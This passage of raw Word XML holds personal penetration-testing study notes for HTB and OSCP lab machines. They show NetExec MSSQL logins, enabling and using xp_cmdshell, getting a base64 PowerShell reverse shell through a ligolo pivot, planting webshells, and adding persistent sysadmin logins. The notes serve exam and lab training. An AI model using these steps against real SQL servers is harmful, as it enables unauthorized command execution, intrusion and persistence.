          <w:numId w:val="1468"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nxc mssql [IP] -u [user] -p "[pass]"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001959">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1468"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If that doesn't work, try local authentication (instead of domain authentication)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000195A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1468"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nxc mssql [IP] -u [user] -p "[pass]" --local-auth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000195B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1468"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For most HTB, you use local-auth!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000195C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000195D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can also run commands inside of nxc (once you have access to mssql):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000195E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1286"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Just add the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-x</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" flag and then a command, like "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-x whoami</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000195F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1286"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lower case </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">x</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash shell </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">commands. Uppercase </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">X</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">powershell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001960">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1286"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="876300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="47" name="image51.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image51.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52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961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1286"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The underlines part is the output of the "whoami" command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001962">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1286"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If it doesn't work, that means XP_CMD shell is not enabled and we don't have permissions to enable it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001963">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1286"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want to try enabling XP_CMD, you can add the flag "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-M enable_cmdshell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001964">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001965">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to see what modules are in mssql:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001966">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="425"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Add the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-L</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001967">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="425"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For example, you will see "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">enable_cmdshell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" or like "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mssql_priv</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001968">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001969">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Domain authentication vs. Local Authentication:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000196A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1185"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Domain authentication: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The credentials are interpreted as DOMAIN\user, and the tool will try to authenticate using that context.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000196B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1185"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Local Authentication: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The credentials are interpreted as local account on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000196C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000196D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_o3swb7inbl7b" w:id="205"/>
      <w:bookmarkEnd w:id="205"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to get command execution in mssql after you are sysadmin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000196E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We saw this in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> OSCP-B .148</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000196F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001970">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT is_srvrolemember('sysadmin');</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and you get "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">", then you are sysadmin and you can do anything. </w:t>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t xml:space="preserve">Here is how to enable command execution:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001973">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXEC sp_configure 'show advanced options', 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001974">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RECONFIGURE;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001975">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXEC sp_configure 'xp_cmdshell', 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001976">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RECONFIGURE;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001977">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>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t xml:space="preserve">-- Example: run whoami</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001979">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXEC xp_cmdshell 'whoami';</w:t>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t xml:space="preserve">We can then get a reverse shell! But, from my experience in OSCP-B .147 machine, we have to Base64 encode the rev shell. And it's best to use powershell, so we don't have to upload nc.exe.</w:t>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t xml:space="preserve">Use </w:t>
      </w:r>
      <w:hyperlink r:id="rId521">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">revshells.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and use the powershell #3 (base64) payload</w:t>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t xml:space="preserve">And in this case, we were in 10 subnet machines that couldn't access our kali (192 subnet), so we had to set up a listener on our ligolo pivot, and then send rev shell to pivot which is forwarded to our kali. </w:t>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t xml:space="preserve">And here are some other things you can do:</w:t>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1445"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Write files to disk (webshells, reverse shells, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001984">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1445"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use bcp, OPENROWSET, or xp_cmdshell to drop malicious files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001985">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1445"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the server hosts a web application, you can write a .aspx or .php webshell into the webroot.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001986">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1445"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Add new logins or users</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001987">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1445"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can persist access by adding new SQL Server logins with sysadmin rights:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001988">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jif9wy8cijju" w:id="206"/>
      <w:bookmarkEnd w:id="206"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to run commands within mssql</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xp_cmdshell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000198B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="212"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is a</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> built-in extended stored procedure in SQL Server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000198C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="212"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It allows execution of system-level commands (Windows CMD commands) directly from within SQL Server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000198D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="212"/>
